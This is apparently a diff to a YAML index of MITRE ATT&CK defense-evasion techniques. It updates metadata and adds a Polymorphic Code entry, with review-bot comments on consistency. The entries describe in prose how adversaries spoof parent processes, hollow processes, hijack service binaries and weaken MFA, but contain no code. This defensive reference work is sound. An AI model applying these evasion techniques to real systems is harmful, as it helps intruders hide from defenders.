+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests: []
T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
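Review bot: the contributor rename from `Goldstein Menachem` to `Menachem Goldstein` fixes the name order; check whether the same contributor is listed under the old form on other technique entries in this index so the spelling is consistent everywhere, not only on T1078.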
@@ -9523,19 +9610,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
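Review bot: the T1078 platform list drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`, with `x_mitre_version` going from '2.6' to '2.7'. If the per-platform index CSVs in this repository are generated from the platform list, regenerate them in the same change so the CSV indexes and this YAML agree on which platforms T1078 belongs to. The `x_mitre_modified_by_ref` removal here is only a move; it is re-added at the end of the entry in the next hunk.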
@@ -9583,11 +9668,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
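Review bot: the Leitch Hollowing reference moves from the original host (`http://www.autosectools.com/process-hollowing.pdf`) to a copy on a different domain (`https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`) with a new retrieval date. The https scheme is an improvement, but confirm the new URL is the one carried by the upstream ATT&CK reference rather than a locally chosen mirror, so the index does not diverge from the source data it tracks.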
@@ -9713,7 +9798,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
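Review bot: `modified` moves backwards here (2022-05-24 to 2022-05-05), and the same happens for several techniques further down (T1036.001, T1564.006, T1134.005, T1599, T1548.004, T1218.010, T1574.009, T1218.009, T1564.007, T1197). A timestamp going backwards normally means the generator is now reading a different upstream bundle than the one the previous index was built from; state in the commit message which ATT&CK release these entries were regenerated from so the change in timestamps is explainable.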
@@ -9735,7 +9820,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
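Review bot: the platform list for T1556.006 replaces "Azure AD", "Office 365" and "Google Workspace" with "Office Suite" and "Identity Provider" (version 1.2 to 1.3); any per-platform index files in this repository that are keyed on the old platform strings will no longer pick this technique up and need regenerating in the same change. Also note that `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are added here and removed from the bottom of the object in the following hunk; that is a pure key reorder, so make sure both hunks land together or the object ends up with duplicate keys.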
@@ -9955,9 +10041,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
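Review bot: for T1036.001 this hunk removes `x_mitre_attack_spec_version: 2.1.0` without re-adding it anywhere visible, whereas T1055.012 in the first hunk was bumped from 3.1.0 to 3.2.0 instead. Unless the field is re-added in lines outside the hunk, this object loses its attack spec version entirely; consistent treatment would be to bump it to 3.2.0 like the others.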
@@ -10038,7 +10119,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
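Review bot: same issue as T1036.001 above: T1564.006 loses `x_mitre_attack_spec_version: 2.1.0` with no replacement. The new T1027.014 (Polymorphic Code) entry itself looks consistent with the other v16-era objects (spec 3.2.0, created 2024-09-27, `atomic_tests: []`), and the description text is upstream ATT&CK content, including the trailing `\n` and the space before `\nOther`, so it should not be touched by the generator; just confirm the empty `atomic_tests` list is what the index build expects for techniques with no tests.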
@@ -10128,7 +10277,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
